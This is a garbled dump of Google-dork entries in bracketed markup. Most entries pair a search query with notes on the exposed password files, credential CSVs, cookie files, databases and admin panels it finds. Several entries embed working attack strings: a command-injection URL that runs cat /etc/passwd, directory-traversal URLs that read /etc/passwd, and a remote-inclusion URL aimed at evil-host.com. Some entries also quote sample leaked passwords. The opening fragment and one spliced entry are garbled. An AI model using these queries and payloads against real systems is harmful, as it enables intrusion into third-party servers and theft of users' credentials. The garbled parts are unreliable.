These are tagged, hacked, rooted and filled servers, in wich pplz from forums or irc channels (in most cases, usuasly private) share filez (yes yes p2p suxz)

And again thnxz goo 4 help us to find it.
[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=hAcxFtpScan&btnG=Google+Search[url]] [[dork]hAcxFtpScan[dork]] [end][416]] [[start][418] [[title]data filetype:mdb -site:gov -site:mil[[title]] [[descr]Microsoft Access databases containing all kinds of 'data'. [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=data+filetype%3Amdb+-site%3Agov+-site%3Amil&btnG=Search[url]] [[dork]data filetype:mdb -site:gov -site:mil[dork]] [end][418]] [[start][419] [[title]inurl:email filetype:mdb[[title]] [[descr]Microsoft Access databases containing email information..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aemail+filetype%3Amdb&btnG=Search[url]] [[dork]inurl:email filetype:mdb[dork]] [end][419]] [[start][420] [[title]inurl:backup filetype:mdb[[title]] [[descr]Microsoft Access database backups..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Abackup+filetype%3Amdb&btnG=Search[url]] [[dork]inurl:backup filetype:mdb[dork]] [end][420]] [[start][421] [[title]inurl:forum filetype:mdb[[title]] [[descr]Microsoft Access databases containing 'forum' information ..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aforum+filetype%3Amdb&btnG=Search[url]] [[dork]inurl:forum filetype:mdb[dork]] [end][421]] [[start][422] [[title]intitle:"Index Of" cookies.txt size[[title]] [[descr]Searches for cookies.txt file. 
On MANY servers this file holds all cookie information, which may include usernames, passwords, but also gives an attacker some juicy information on this users surfing habits.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+Of%22+cookies.txt+%22size%22&btnG=Search[url]] [[dork]intitle:"Index Of" cookies.txt "size"[dork]] [end][422]] [[start][423] [[title]intext:(password | passcode) intext:(username | userid | user) filetype:csv[[title]] [[descr]CSV formatted files containing all sorts of user/password combinations. Results may vary, but are still interesting to the casual attacker..[descr]] [[url]http://www.google.com/search?q=intext:(password+%7C+passcode)+intext:(username+%7C+userid+%7C+user)+++filetype:csv&hl=en&lr=&ie=UTF-8&start=0&sa=N[url]] [[dork]intext:(password | passcode) intext:(username | userid | user) filetype:csv[dork]] [end][423]] [[start][424] [[title]inurl:profiles filetype:mdb[[title]] [[descr]Microsoft Access databases containing (user) profiles ..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aprofiles+filetype%3Amdb&btnG=Search[url]] [[dork]inurl:profiles filetype:mdb[dork]] [end][424]] [[start][425] [[title]filetype:cgi inurl:"Web_Store.cgi"[title]] [[descr]Zero X reported that "Web_Store.cgi" allows Command Execution:

This application was written by Selena Sol and Gunther Birznieks. You can execute shell commands:
http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|

It is not known which version is affected, and this has not (yet) been confirmed by the googledork forum members. That makes this search of limited use, but to an attacker it may serve as a starting point.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Acgi+inurl%3A%22Web_Store.cgi%22&btnG=Google+Search[url]] [[dork]filetype:cgi inurl:"Web_Store.cgi"[dork]] [end][425]] [[start][426] [[title]ASP.login_aspx "ASP.NET_SessionId"[title]] [[descr].NET based login pages serving the whole environment and process trace for your viewing pleasure..

These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=ASP.login_aspx+%22ASP.NET_SessionId%22&btnG=Search[url]] [[dork]ASP.login_aspx "ASP.NET_SessionId"[dork]] [end][426]] [[start][427] [[title]"ASP.NET_SessionId" "data source="[title]] [[descr].NET pages revealing their datasource and sometimes the authentication credentials with it. The complete debug line looks something like this for example:

strConn System.String Provider=sqloledb;Network Library=DBMSSOCN;Data Source=ch-sql-91;Initial Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*

For quick fun an attacker could modify this search to find those who use Microsoft Access as their storage: <"ASP.NET_SessionId" "data source=" *.mdb> It will not surprise the experienced security digger that these files are often in a downloadable location on the server.
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22ASP.NET_SessionId%22+%22data+source%3D%22&btnG=Search[url]] [[dork]"ASP.NET_SessionId" "data source="[dork]] [end][427]] [[start][428] [[title]"Novell, Inc" WEBACCESS Username Password "Version *.*" Copyright -inurl:help -guides|guide[[title]] [[descr]This may be used to find Novell GroupWise WebAccess servers.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Novell%2C+Inc%22+WEBACCESS+Username+Password+%22Version+*.*%22+Copyright++-inurl%3Ahelp+-guides%7Cguide&btnG=Search[url]] [[dork]"Novell, Inc" WEBACCESS Username Password "Version *.*" Copyright -inurl:help -guides|guide[dork]] [end][428]] [[start][429] [[title]"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd[[title]] [[descr]FrontPage.. very nice clean search results listing!!
No further comments required..

changelog:
22 jan 2005: improved by vs1400 ! [descr]] [[url]http://www.google.com/search?q=ext%3Apwd+inurl%3A%28service+%7C+authors+%7C+administrators+%7C+users%29+%22%23+-FrontPage-%22[url]] [[dork]ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"[dork]] [end][429]] [[start][430] [[title]filetype:cgi inurl:"fileman.cgi"[title]] [[descr]This brings up a lot of insecure as well as secure file managers. These software solutions are often used by companies offering a "simple" but "cost effective" way to their users who don't know unix or html. There is sometimes a problem with this specific file manager due to insecure use of the session ID, which can be found in the unprotected "fileman.log" logfile.

It has been reported that an attacker can abuse the last document-edit URL in the logfile. Copying and pasting that line into a new window gives the attacker valid user credentials on the server, at least for a while.. (think hours, not seconds).[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acgi+inurl%3A%22fileman.cgi%22&btnG=Search[url]] [[dork]filetype:cgi inurl:"fileman.cgi"[dork]] [end][430]] [[start][431] [[title]intitle:"Index Of" -inurl:maillog maillog size[[title]] [[descr]This Google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to date, all of which contain various chunks of information (i.e. usernames, email addresses, login/logout times of users, IP addresses, directories on the server etc. etc.)

Someone with this information could dig up info on the server before trying to penetrate it, by finding usernames and email addresses of accounts on the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Index+Of%22+-inurl%3Amaillog++maillog+size[url]] [[dork]intitle:"Index Of" -inurl:maillog maillog size[dork]] [end][431]] [[start][433] [[title]"error found handling the request" cocoon filetype:xml[[title]] [[descr]Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied to them, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.html

This Cocoon error displays library functions, cocoon version number, and full and/or relative path names.
[descr]] [[url]http://www.google.com/search?num=100&q=%22error+found+handling+the+request%22+cocoon+filetype%3Axml[url]] [[dork]"error found handling the request" cocoon filetype:xml[dork]] [end][433]] [[start][434] [[title]Canon Webview netcams[[title]] [[descr]Canon has a series of netcams that all use the "WebView LiveScope" software. They are frequently used by Japanese sites. Unfortunately most are crawled by their IP address, so determining their location becomes more difficult. Some model names are:

* VB-C10
* VB-101
* VB-C50i

This search looks for the Java applet called "LiveApplet" that is used by Canon's network camera feeds. There is also a standalone (free) program that is easier to control and lets you save bookmarks. It's available for PC and Mac. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi[descr]] [[url]http://www.google.com/search?q=intitle%3Aliveapplet+inurl%3ALvAppl[url]] [[dork]intitle:liveapplet inurl:LvAppl[dork]] [end][434]] [[start][435] [[title]inurl:"index.php? module=ew_filemanager"[title]] [[descr]http://www.cirt.net/advisories/ew_file_manager.shtml:

Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.php

Description: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1

Technical Description: The PostNuke module works by loading a directory and/or file via the "pathext" (directory) and "view" (file) variables. Providing a relative path (from the document repository) in the "pathext" variable will cause FileManager to provide a directory listing of that directory. Selecting a file in that listing, or putting a file name in the "view" variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.

Assuming PostNuke is installed at the root level:
/etc directory listing:
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc

/etc/passwd file:
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd

Fix/Workaround:
Use another file manager module for PostNuke, as the authors do not appear to be
maintaining EW FileManager.

Vendor Status: Vendor was contacted but did not respond.
Credit: Sullo - cirt.net

NOTE: mitigating factor, an attacker needs to be registered and logged on to have access rights to this module.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22index.php%3Fmodule%3Dew_filemanager%22[url]] [[dork]inurl:"index.php?module=ew_filemanager"[dork]] [end][435]] [[start][436] [[title]allinurl:"index.php" "site=sglinks"[title]] [[descr]Easyins Stadtportal v4 is a German Content Management System for cities and regions. Version 4 and prior seem to be vulnerable to code inclusion in index.php. Bugtraq: http://www.securityfocus.com/bid/10795

http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com
[descr]] [[url]http://www.google.com/search?q=allinurl:%22index.php%22+%22site=sglinks%22&num=100&start=100[url]] [[dork]allinurl:"index.php" "site=sglinks"[dork]] [end][436]] [[start][437] [[title]"powered by" "shoutstats" hourly daily[[title]] [[descr]Shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and an RRDtool database. It was written under Debian GNU/Linux.

http://www.glop.org/projects/shoutstats

This search can be used to find Shoutcast servers.[descr]] [[url]http://www.google.com/search?q=%22powered+by%22+%22shoutstats%22+hourly+daily&num=100&filter=0[url]] [[dork]"powered by" "shoutstats" hourly daily[dork]] [end][437]] [[start][438] [[title]intitle:"Shoutcast Administrator"[title]] [[descr]Shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Shoutcast+Administrator%22[url]] [[dork]intitle:"Shoutcast Administrator"[dork]] [end][438]] [[start][439] [[title]inurl:"utilities/TreeView.asp"[title]] [[descr]From the marketing brochure: "UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today."

The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the login name.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22utilities%2FTreeView.asp%22[url]] [[dork]inurl:"utilities/TreeView.asp"[dork]] [end][439]] [[start][440] [[title]filetype:pwl pwl[[title]] [[descr]These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users' passwords. The following example has been provided:

---
Resource table: 0292 0294 0296 0298 (..etc..)
File: C:\Downloads\2004-07\07-26\USER1.PWL
User name: 'USER1'
Password: ''
Dial-up:'*Rna\Internet\PJIU_TAC'
Password:'PJIUSCAC3000'
---[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Apwl+pwl[url]] [[dork]filetype:pwl pwl[dork]] [end][440]] [[start][441] [[title]"apricot - admin" 00h[[title]] [[descr]This search shows the webserver access stats as the user "admin". The language used is Japanese and the search includes the "00h" value which is only shown when the admin is logged in.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22apricot+-+admin%22+00h&btnG=Google+Search[url]] [[dork]"apricot - admin" 00h[dork]] [end][441]] [[start][442] [[title]filetype:ora ora[[title]] [[descr]The *.ora files are configuration files for Oracle clients. An attacker can identify an Oracle database this way and get more juicy information by searching for ora config files.

This search can be modified to be more specific:

- filetype:ora sqlnet
- filetype:ora names [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aora+ora&btnG=Search[url]] [[dork]filetype:ora ora[dork]] [end][442]] [[start][443] [[title]filetype:wsdl wsdl[[title]] [[descr]The XML headers are called *.wsdl files.
They can include data, functions or objects. An attacker with knowledge of XML coding can sometimes do evil things with this stuff. [descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Awsdl+wsdl&btnG=Search[url]] [[dork]filetype:wsdl wsdl[dork]] [end][443]] [[start][444] [[title]filetype:inc inc intext:setcookie[[title]] [[descr]Cookies are often used for authentication and a lot of other stuff.
The "inc" php header files often include the exact syntax of the cookies.

An attacker may create his own cookie with the information he has taken from the header file and start cookie poisoning.[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Ainc+inc+intext%3Asetcookie[url]] [[dork]filetype:inc inc intext:setcookie[dork]] [end][444]] [[start][445] [[title]inurl:/wwwboard[[title]] [[descr]The software wwwboard stores its passwords in a file called "passwd.txt".

An attacker may try to search for

inurl:/wwwboard

then add "passwd.txt" to it (../wwwboard/passwd.txt) and crack the DES passwords.[descr]] [[url]http://www.google.com/search?num=100&q=inurl%3A%2Fwwwboard[url]] [[dork]inurl:/wwwboard[dork]] [end][445]] [[start][446] [[title]"allow_call_time_pass_reference" "PATH_INFO"[title]] [[descr]Returns publicly visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called "phpinfo.php". Some result files that include phpinfo are:
[descr]] [[url]http://www.google.com/search?num=100&q=%22allow_call_time_pass_reference%22+%22PATH_INFO%22[url]] [[dork]"allow_call_time_pass_reference" "PATH_INFO"[dork]] [end][446]] [[start][447] [[title]inurl:*db filetype:mdb[[title]] [[descr]More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Adb+filetype%3Amdb+[url]] [[dork]inurl:*db filetype:mdb [dork]] [end][447]] [[start][448] [[title]filetype:fp5 fp5 -site:gov -site:mil -"cvs log"[title]] [[descr]These are various kinds of FileMaker Pro Databases (*.fp5 applies to both version 5 and 6).

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Afp5+fp5+-site%3Agov+-site%3Amil+-%22cvs+log%22&btnG=Search[url]] [[dork]filetype:fp5 fp5 -site:gov -site:mil -"cvs log"[dork]] [end][448]] [[start][449] [[title]inurl:gotoURL.asp?url=[[title]] [[descr]ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)

On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)

Problem: the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input variables and makes SQL injection possible.

For examples check the original advisory posted to a Spanish forum:

http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/
foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en

(link broken in two lines, glue them together first :-)

An attacker can obtain the user and admin passwords by crafting a SQL statement.[descr]] [[url]http://www.google.com/search?q=inurl%3AgotoURL.asp%3Furl%3D[url]] [[dork]inurl:gotoURL.asp?url=[dork]] [end][449]] [[start][450] [[title]Phasers 4500/6250/8200/8400[[title]] [[descr]More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the web interface with this search.[descr]] [[url]http://www.google.com/search?q=intext%3Acentreware+inurl%3Astatus[url]] [[dork]intext:centreware inurl:status[dork]] [end][450]] [[start][451] [[title]filetype:fp3 fp3[[title]] [[descr]These are FileMaker Pro version 3 Databases.[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Afp3+fp3[url]] [[dork]filetype:fp3 fp3[dork]] [end][451]] [[start][452] [[title]filetype:fp7 fp7[[title]] [[descr]These are FileMaker Pro version 7 database files.[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Afp7+fp7[url]] [[dork]filetype:fp7 fp7[dork]] [end][452]] [[start][454] [[title]"powered by antiboard"[title]] [[descr]"AntiBoard is a small and compact multi-threaded bulletin board/message board system written in PHP. It uses either MySQL or PostgreSQL as the database backend, and has support for different languages. It is not meant as the end all be all of bulletin boards, but rather something to easily integrate into your own page."

There is an excellent vulnerability report at:
http://www.securiteam.com/unixfocus/5XP010ADPY.html

Vendor Status:
The vendor has been informed of the issues on the 28th July 2004, however no fix is planned in the near future.


[descr]] [[url]http://www.google.com/search?num=100&q=%22powered+by+antiboard%22[url]] [[dork]"powered by antiboard"[dork]] [end][454]] [[start][455] [[title](inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil[[title]] [[descr]From the vendor site: "Remedy’s Action Request System® is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming."

Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames and emails.[descr]] [[url]http://www.google.com/search?num=100&q=%28inurl%3A%22ars%2Fcgi-bin%2Farweb%3FO%3D0%22+%7C+inurl%3Aarweb.jsp%29+-site%3Aremedy.com+-site%3Amil[url]] [[dork](inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil[dork]] [end][455]] [[start][456] [[title]filetype:cfg auto_inst.cfg[[title]] [[descr]Mandrake auto-install configuration files. These contain information about the installed packages, networking settings and even user accounts.[descr]] [[url]http://www.google.com/search?q=filetype%3Acfg+auto_inst.cfg[url]] [[dork]filetype:cfg auto_inst.cfg[dork]] [end][456]] [[start][457] [[title]intitle:Node.List Win32.Version.3.11[[title]] [[descr]Synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.

An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess.[descr]] [[url]http://www.google.com/search?q=intitle%3ANode.List+Win32.Version.3.11[url]] [[dork]intitle:Node.List Win32.Version.3.11[dork]] [end][457]] [[start][458] [[title]"AutoCreate=TRUE password=*"[title]] [[descr]This search finds the password for "Website Access Analyzer", a Japanese software that creates web statistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/

Note: use Google to find the results of this software.
[descr]] [[url]http://www.google.com/search?num=100&&q=%22AutoCreate%3DTRUE+password%3D*%22[url]] [[dork]"AutoCreate=TRUE password=*"[dork]] [end][458]] [[start][459] [[title]intext:"d.aspx?id" || inurl:"d.aspx?id"[title]] [[descr]"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transmission."

This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys..[descr]] [[url]http://www.google.com/search?q=intext%3A%22d.aspx%3Fid%22+%7C%7C+inurl%3A%22d.aspx%3Fid%22[url]] [[dork]intext:"d.aspx?id" || inurl:"d.aspx?id"[dork]] [end][459]] [[start][461] [[title]filetype:pass pass intext:userid[[title]] [[descr]Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Apass+pass+intext%3Auserid&btnG=Search[url]] [[dork]filetype:pass pass intext:userid[dork]] [end][461]] [[start][462] [[title]inurl:/cgi-bin/sqwebmail?noframes=1[[title]] [[descr]SQWebmail login portals.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fcgi-bin%2Fsqwebmail%3Fnoframes%3D1&btnG=Search[url]] [[dork]inurl:/cgi-bin/sqwebmail?noframes=1[dork]] [end][462]] [[start][463] [[title]filetype:ini ServUDaemon[[title]] [[descr]The Serv-U FTP Daemon ini file contains settings and session information including usernames, passwords and more. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aini+ServUDaemon&btnG=Search[url]] [[dork]filetype:ini ServUDaemon[dork]] [end][463]] [[start][465] [[title]inurl:comersus_message.asp[[title]] [[descr]About Comersus: "Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers."

Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/

This search finds the XSS vulnerable file comersus_message.asp?message= ..

No version info is included with the search. Not all results are vulnerable.

[descr]] [[url]http://www.google.com/search?q=inurl%3Acomersus_message.asp[url]] [[dork]inurl:comersus_message.asp[dork]] [end][465]] [[start][466] [[title]intitle:"teamspeak server-administration[[title]] [[descr]TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal.

[descr]] [[url]http://www.google.com/search?q=intitle%3A%22teamspeak+server-administration[url]] [[dork]intitle:"teamspeak server-administration[dork]] [end][466]] [[start][467] [[title]ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input[[title]] [[descr]FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early versions didn't have a referer check. Newer versions can be misconfigured.

Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.

http://www.securityfocus.com/bid/3954/discussion/[descr]] [[url]http://www.google.com/search?num=100&q=ext%3Apl+inurl%3Acgi+intitle%3A%22FormMail+*%22++-%22*Referrer%22+-%22*+Denied%22+-sourceforge+-error+-cvs+-input[url]] [[dork]ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input[dork]] [end][467]] [[start][468] [[title](inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt[[title]] [[descr]Webmasters wanting to exclude search engine robots from certain parts of their site often choose to use a robots.txt file in the root of the server. This file basically tells the bot which directories are supposed to be off-limits.

An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the "disallow" keyword.[descr]] [[url]http://www.google.com/search?num=100&q=%28inurl%3A%22robot.txt%22+%7C+inurl%3A%22robots.txt%22+%29+intext%3Adisallow+filetype%3Atxt[url]] [[dork](inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt[dork]] [end][468]] [[start][469] [[title]intext:"Session Start * * * *:*:* *" filetype:log[[title]] [[descr]These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun.[descr]] [[url]http://www.google.com/search?q=intext:%22Session+Start+*+*+*+*:*:*+*%22+filetype:log&num=100[url]] [[dork]intext:"Session Start * * * *:*:* *" filetype:log[dork]] [end][469]] [[start][470] [[title]"WebSTAR Mail - Please Log In"[title]] [[descr]@stake, Inc. advisory: "4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources."

See also: http://www.securityfocus.com/archive/1/368778[descr]] [[url]http://www.google.com/search?q=%22WebSTAR+Mail+-+Please+Log+In%22[url]] [[dork]"WebSTAR Mail - Please Log In"[dork]] [end][470]] [[start][471] [[title]Ultima Online loginservers[[title]] [[descr]This one finds login servers for the Ultima Online game. [descr]] [[url]http://www.google.com/search?q=filetype%3Acfg+login+%22LoginServer%3D%22[url]] [[dork]filetype:cfg login "LoginServer="[dork]] [end][471]] [[start][473] [[title]mail filetype:csv -site:gov intext:name[[title]] [[descr]CSV Exported mail (user) names and such.[descr]] [[url]http://www.google.com/search?q=mail+filetype%3Acsv+-site%3Agov+intext%3Aname[url]] [[dork]mail filetype:csv -site:gov intext:name[dork]] [end][473]] [[start][474] [[title]filetype:xls -site:gov inurl:contact[[title]] [[descr]Microsoft Excel sheets containing contact information.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+-site%3Agov+inurl%3Acontact&btnG=Search[url]] [[dork]filetype:xls -site:gov inurl:contact[dork]] [end][474]] [[start][475] [[title]"images in this album on"[title]] [[descr]Reveals personal photo albums which can be useful for SE jobs.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22images+in+this+album+on%22&btnG=Google+Search[url]] [[dork]"images in this album on"[dork]] [end][475]] [[start][476] [[title]inurl:nuke filetype:sql[[title]] [[descr]This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. 
These database dumps contain usernames and (sometimes) encrypted passwords for users of the system.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Anuke+filetype%3Asql&btnG=Search[url]] [[dork]inurl:nuke filetype:sql[dork]] [end][476]] [[start][477] [[title]intitle:"please login" "your password is *"[title]] [[descr]These administrators were friendly enough to give hints about the password.[descr]] [[url]http://www.google.com/search?num=50&q=intitle%3A%22please+login%22+%22your+password+is+*%22[url]] [[dork]intitle:"please login" "your password is *"[dork]] [end][477]] [[start][478] [[title]intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums[[title]] [[descr]OsCommerce has some security issues, including the following warning message: "Warning: I am able to write to the configuration file". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883

With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there.[descr]] [[url]http://www.google.com/search?q=intext:%22Warning:+*+am+able+*+write+**+configuration+file%22+%22includes/configure.php%22+-Forums&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N[url]] [[dork]intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums[dork]] [end][478]] [[start][484] [[title]inurl:/db/main.mdb[[title]] [[descr]ASP-Nuke database file containing passwords.

This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location.[descr]] [[url]http://www.google.com/search?q=inurl%3A%2Fdb%2Fmain.mdb[url]] [[dork]inurl:/db/main.mdb[dork]] [end][484]] [[start][485] [[title]inurl:cgi-bin/ultimatebb.cgi?ubb=login[[title]] [[descr]These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search

This next search finds all UBB pages with the infopop image and a link to the developers.
http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1[descr]] [[url]http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1[url]]

This searches pathto.asp files and allows an attacker to know the exact installed path of the software.

Examples:
The path to your Site is -- g:\0E5\goldenstateeng.xxx\web
The path to your Site is -- D:\inetpub\wwwroot\01xx738\mc10s9izz

[descr]] [[url]http://www.google.com/search?q=ext%3Aasp+inurl%3Apathto.asp[url]] [[dork]ext:asp inurl:pathto.asp[dork]] [end][486]] [[start][487] [[title]ext:cgi inurl:ubb6_test[[title]] [[descr]The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:

"CAUTIONS: Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk."

This is the UBB6 Permissions & Paths Diagnostic Script.

Example:
UBB Version 6.1.0.3
Perl Version 5.006
Server Type Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b
check path:
1. check permission to write new files in this directory
2. check for the 'required' files in both the CGI and this directory
3. check my read/write permissions on all the variables files
4. check my absolute paths in general settings if available

version 2.1 © 2001 Infopop Corporation All Rights Reserved[descr]] [[url]http://www.google.com/search?q=ext%3Acgi+inurl%3Aubb6_test.cgi[url]] [[dork]ext:cgi inurl:ubb6_test.cgi[dork]] [end][487]] [[start][488] [[title]"this proxy is working fine!" "enter *" "URL***" * visit[[title]] [[descr]These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy.

The experts' comment on this is that there are much better solutions for surfing anonymously. [descr]] [[url]http://www.google.com/search?q=%22this+proxy+is+working+fine!%22+%22enter+*%22+%22URL***%22+*+visit&num=100&filter=0[url]] [[dork]"this proxy is working fine!" "enter *" "URL***" * visit[dork]] [end][488]] [[start][489] [[title]PassMaster cleartext passwords[[title]] [[descr]The site javafile.com has several password "protection" solutions, see hxxp://www.javafile.com/password.php (url xx'd). This search exposes the "PassMaster" product passwords. It's so easy you should never consider this product for anything serious.

An attacker can use this to read the cleartext passwords which are not protected in any way from viewing.
[descr]] [[url]http://www.google.com/search?num=100&q=ext%3Alog+password+END_FILE[url]] [[dork]ext:log password END_FILE[dork]] [end][489]] [[start][491] [[title]"http://*:*@www" domainname[[title]] [[descr]This is a query to get inline passwords from search engines (not just Google). You must type in the query followed by the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing
